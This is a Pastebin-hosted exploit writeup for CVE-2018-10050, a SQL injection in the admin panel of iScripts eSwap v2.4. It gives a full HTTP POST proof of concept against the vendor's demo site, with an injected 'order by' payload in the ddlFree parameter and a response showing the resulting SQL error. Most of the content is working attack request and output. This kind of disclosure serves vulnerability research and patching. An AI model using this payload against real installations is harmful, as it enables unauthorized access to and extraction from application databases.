daily pastebin goal
15%
SHARE
TWEET

CVE-2018-10050

ManhNho Apr 11th, 2018 (edited) 110 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit title: iScripts eSwap v2.4 - SQL injection via the registration_settings.php Admin Panel
  2. # Date: 11/04/2018
  3. # Exploit Author: ManhNho
  4. # Vendor Homepage: https://www.iscripts.com
  5. # Software Link: https://www.iscripts.com/eswap
  6. # Demo Link: https://www.demo.iscripts.com/eswap/demo//admin/adminmain.php
  7. # Version: 2.4
  8. # CVE: CVE-2018-10050
  9. # Tested on: Windows 10 / Kali Linux
  10. # Category: Webapps
  11.  
  12.  
  13. #1. Description
  14. -----------------------------------------------------
  15. iScripts eSwap v2.4 has SQL injection via the "registration_settings.php" function parameter in Admin Panel.
  16.  
  17.  
  18. #2. Proof of Concept
  19. -----------------------------------------------------
  20.  
  21. Request:
  22.  
  23. POST /eswap/demo//admin/registration_settings.php?act=post HTTP/1.1
  24. Host: www.demo.iscripts.com
  25. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
  26. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  27. Accept-Language: en-GB,en;q=0.5
  28. Accept-Encoding: gzip, deflate
  29. Referer: https://www.demo.iscripts.com/eswap/demo//admin/registration_settings.php
  30. Content-Type: application/x-www-form-urlencoded
  31. Content-Length: 34
  32. Cookie: __utma=227100805.298811387.1522637403.1523431492.1523438388.8; __utmz=227100805.1522637403.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); messagesUtk=9ae2fcc5306f4d9c8d433f0f58efb968; __utma=129714457.1603653646.1523416273.1523416273.1523433224.2; __utmz=129714457.1523433224.2.2.utmcsr=iscripts.com|utmccn=(referral)|utmcmd=referral|utmcct=/supportdesk/demo.php; PHPSESSID=i3nkqgvua59eplfm18urecqdb1; __utmb=227100805; __utmc=227100805; hs-messages-is-open=false
  33. Connection: close
  34. Upgrade-Insecure-Requests: 1
  35.  
  36. ddlFree= 1' order by 10 # &txtDate=1
  37.  
  38. Response:
  39.  
  40. HTTP/1.1 200 OK
  41. Date: Wed, 11 Apr 2018 10:06:11 GMT
  42. Server: Apache
  43. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  44. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  45. Pragma: no-cache
  46. Connection: close
  47. Content-Type: text/html
  48. Content-Length: 2645
  49. ...
  50. <div class="clear"></div>
  51. </div>
  52. </div>
  53. Unknown column '10' in 'order clause'
RAW Paste Data
Top